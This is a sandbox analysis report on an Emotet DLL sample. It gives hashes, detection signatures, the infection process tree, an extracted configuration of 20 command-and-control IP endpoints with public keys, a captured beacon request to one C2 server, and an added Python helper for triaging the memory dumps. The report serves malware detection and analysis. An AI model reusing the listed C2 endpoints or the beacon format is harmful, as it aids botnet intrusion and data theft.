
Windows Analysis Report spZRMihlrkFGqYq1f.dll

Overview

General Information

Sample Name:spZRMihlrkFGqYq1f.dll
Analysis ID:531996
MD5:9f4fa905fd685d28c4ff28f24ad224a1
SHA1:e186e0869276d3af6465d7c754b22527c7ac2ced
SHA256:808e8247efd685bdbae3ea0e55de1e8ed8aecd1359a213b0c6291b73f007fdaf

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6816 cmdline: loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6860 cmdline: rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6792 cmdline: rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 3476 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6836 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6904 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(29 entries in total; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.rundll32.exe.5880000.10.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.56b0000.6.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.4910000.9.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
3.2.rundll32.exe.3f80000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.59a0000.13.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
(46 entries in total; first 5 shown)

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation
Source: Process started, Author: FPT.EagleEye, Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, CommandLine|base64offset|contains: (empty), Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4928, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL, ProcessId: 3476

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 7.2.rundll32.exe.5970000.12.raw.unpack, Malware Configuration Extractor: Emotet (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: spZRMihlrkFGqYq1f.dll, Metadefender: Detection: 42%
Source: spZRMihlrkFGqYq1f.dll, ReversingLabs: Detection: 56%
Source: spZRMihlrkFGqYq1f.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002592C lstrlenA,FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002F3E9 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04EE1A80 FindFirstFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49775 -> 51.178.61.60:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 51.178.61.60 187
C2 URLs / IPs found in malware configuration (the 20 C2 endpoints are those listed in the Malware Configuration section above)
Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View, ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: global traffic, HTTP traffic detected: GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1 Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View, IP Address: 196.44.98.190 196.44.98.190
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown, Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown, TCP traffic detected without corresponding DNS query: 51.178.61.60 (reported 10 times)
Source: svchost.exe, 0000000C.00000002.841835956.000001A770300000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000C.00000003.815472135.000001A77036C000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815399183.000001A77038E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.815513139.000001A7703DD000.00000004.00000001.sdmp, String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000C.00000003.818284709.000001A77038B000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818383957.000001A770802000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818022632.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818039351.000001A7703A2000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.818344967.000001A770372000.00000004.00000001.sdmp, String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_04EF1027 InternetReadFile,
Source: loaddll32.exe, 00000000.00000002.714043179.0000000000BFB000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10014B67 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1002C51C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

E-Banking Fraud:

Yara detected Emotet
Source: Yara match, File source: 7.2.rundll32.exe.5880000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.56b0000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4910000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.3f80000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.59a0000.13.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4880000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4880000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5a90000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4a40000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5bd0000.17.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.46e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.34d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.56e0000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5a90000.14.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5970000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5ba0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5ba0000.16.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4710000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.4f80000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.4ea0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4a40000.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.rundll32.exe.41a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.46e0000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.rundll32.exe.42d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.58b0000.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.4ed0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4a70000.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4040000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4040000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5880000.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.30a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.4630000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.3fc0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.rundll32.exe.41a0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.56b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.48e0000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5810000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.3f80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5970000.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.48b0000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.30a0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.rundll32.exe.48e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.4ea0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5600000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.30d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.4f80000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.rundll32.exe.5ac0000.15.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232814811.0000000005BD1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232471736.0000000005841000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.1232588764.0000000005970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232613063.00000000059A1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232537029.00000000058B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232513916.0000000005880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232107048.0000000004F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232396043.00000000056E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1232361987.00000000056B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
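The MEMORY rows above are worth more than a hit count: the dump names encode which process the region belongs to, its base address and its page protection, and the Code function rows in the System Summary below give function start addresses inside those regions for processes 4, 6 and 7. The helper below is an added triage example, not part of the original report and not Joe Sandbox code. It assumes the dump name layout `<process index>.<snapshot>.<dump id>.<base address>.<page protection>.<memory type>.sdmp` (inferred from the names on this page; only the PAGE_* values are documented Windows constants), and it assumes each unpacked payload sits in one 64 KiB-aligned allocation so that function addresses can be rebased per process. The sample inputs are copied from the rows on this page.

```python
"""Triage helpers for the Yara-matched memory dumps listed above.

Added example; not part of the original report and not Joe Sandbox code.
Assumption: a dump name is laid out as
    <process index>.<snapshot>.<dump id>.<base address>.<page protection>.<memory type>.sdmp
which is inferred from the names on this page; only the PAGE_* values are
documented Windows constants (winnt.h).
"""
import re

# Windows page protection constants (low byte of the protection field).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0  # any PAGE_EXECUTE* value
WRITABLE_MASK = 0xCC    # PAGE_READWRITE, PAGE_WRITECOPY and their EXECUTE_ variants

DUMP_RE = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<snapshot>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)

# Dump names copied from the Yara match list on this page (processes 3, 4, 6 and 7).
SAMPLE_DUMPS = [
    "00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp",
    "00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp",
    "00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp",
    "00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp",
    "00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp",
    "00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp",
]

# Function start addresses copied from the "Code function" rows in the System
# Summary, three per process, for processes 4, 6 and 7.
SAMPLE_FUNCTIONS = {
    4: [0x030D441E, 0x030ECAA8, 0x030E43B3],
    6: [0x042D441E, 0x042ECAA8, 0x042E43B3],
    7: [0x04ED441E, 0x04EECAA8, 0x04EE43B3],
}


def parse_dump_name(name):
    """Split a dump file name into its fields and decode the page protection."""
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a memory dump name: {name!r}")
    protect = int(m["protect"], 16)
    return {
        "process": int(m["process"], 16),
        "snapshot": int(m["snapshot"], 16),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECTIONS.get(protect & 0xFF, f"0x{protect:08x}"),
        "executable": bool(protect & EXECUTABLE_MASK),
        "writable": bool(protect & WRITABLE_MASK),
    }


def rwx_dumps(names):
    """Return the parsed dumps that were both writable and executable.

    A Yara hit inside PAGE_EXECUTE_READWRITE memory is code that was written
    at run time (unpacked or injected), not a section mapped from an image on
    disk; these are the regions to carve first.
    """
    return [d for d in map(parse_dump_name, names) if d["writable"] and d["executable"]]


def dumps_by_process(names):
    """Group parsed dumps by process index, each list sorted by base address."""
    grouped = {}
    for d in map(parse_dump_name, names):
        grouped.setdefault(d["process"], []).append(d)
    for dumps in grouped.values():
        dumps.sort(key=lambda d: d["base"])
    return grouped


def common_offsets(functions_by_process, granularity=0x10000):
    """Rebase each process's function addresses onto that process's allocation
    base and return the offsets present in every process.

    Assumption: each payload lives in one allocation aligned to the 64 KiB
    VirtualAlloc granularity, so the lowest address rounded down to that
    granularity is the base. Identical offset sets across processes mean the
    same code image was relocated into each of them.
    """
    offset_sets = []
    for addrs in functions_by_process.values():
        base = min(addrs) & ~(granularity - 1)
        offset_sets.append({a - base for a in addrs})
    return set.intersection(*offset_sets) if offset_sets else set()


if __name__ == "__main__":
    for proc, dumps in sorted(dumps_by_process(SAMPLE_DUMPS).items()):
        for d in dumps:
            flag = "RWX" if d["writable"] and d["executable"] else "   "
            print(f"process {proc}: {flag} base=0x{d['base']:08x} {d['protect_name']}")
    print("shared function offsets:", sorted(hex(o) for o in common_offsets(SAMPLE_FUNCTIONS)))
```

On the page's own data the three function addresses chosen for processes 4, 6 and 7 rebase to the same offsets (0x441E, 0x143B3, 0x1CAA8), which is what you expect when one unpacked image is copied into several rundll32 instances; the full Code function lists below show the same pattern for all 89 addresses per process.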

                      System Summary:

                      Source: spZRMihlrkFGqYq1f.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe; File deleted: C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis:Zone.Identifier
                      Source: C:\Windows\SysWOW64\rundll32.exe; File created: C:\Windows\SysWOW64\Feetevsox\
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function (process 3): 3_2_1003F030, 3_2_1003D322, 3_2_100104FC, 3_2_1003B57C, 3_2_1004C668, 3_2_10040E8A
                      Source: C:\Windows\SysWOW64\rundll32.exe; Code function (process 4): 4_2_030E43B3, 4_2_030D441E, 4_2_030ECAA8, 4_2_030D2309, 4_2_030D3502, 4_2_030D251C, 4_2_030EFD10, 4_2_030F292B, 4_2_030D6B25, 4_2_030D5923, 4_2_030F0B34, 4_2_030EF14D, 4_2_030D3345, 4_2_030F1343, 4_2_030D3F5C, 4_2_030DC158, 4_2_030E056A, 4_2_030E1F6B, 4_2_030E577E, 4_2_030D758F, 4_2_030E4D8D, 4_2_030D4F8E, 4_2_030D9384, 4_2_030ED99A, 4_2_030EB397, 4_2_030DFD91, 4_2_030F1193, 4_2_030E4BAA, 4_2_030E2FA2, 4_2_030E9DA1, 4_2_030EB1B5, 4_2_030DBFB6, 4_2_030E7BB2, 4_2_030D6FC4, 4_2_030F25C3, 4_2_030DA3DF, 4_2_030D55E8, 4_2_030EBFE8, 4_2_030DC5FE, 4_2_030F03F1, 4_2_030D8C09, 4_2_030D1A0A, 4_2_030D220A, 4_2_030D4C00, 4_2_030DE21C, 4_2_030DF41F, 4_2_030E1C10, 4_2_030DEC27, 4_2_030E5220, 4_2_030DD223, 4_2_030D9E22, 4_2_030EF83F, 4_2_030F1A3C, 4_2_030DA048, 4_2_030D3845, 4_2_030D2A46, 4_2_030D2043, 4_2_030EE441, 4_2_030D2654, 4_2_030D9A57, 4_2_030E406E, 4_2_030D1C76, 4_2_030DCC8D, 4_2_030E4E8A, 4_2_030E748A, 4_2_030F0687, 4_2_030D7283, 4_2_030EAC9B, 4_2_030DAC95, 4_2_030D3C91, 4_2_030ED091, 4_2_030DDAAE, 4_2_030E44AA, 4_2_030ED6A7, 4_2_030E78A5, 4_2_030DFEA0, 4_2_030E98BD, 4_2_030E90BA, 4_2_030D5AB2, 4_2_030EBEC9, 4_2_030E0ADE, 4_2_030ECCD4, 4_2_030F08D1, 4_2_030E7ED1, 4_2_030EAEEB, 4_2_030EECE3, 4_2_030EDEF4, 4_2_030D30F6, 4_2_030EA8F0
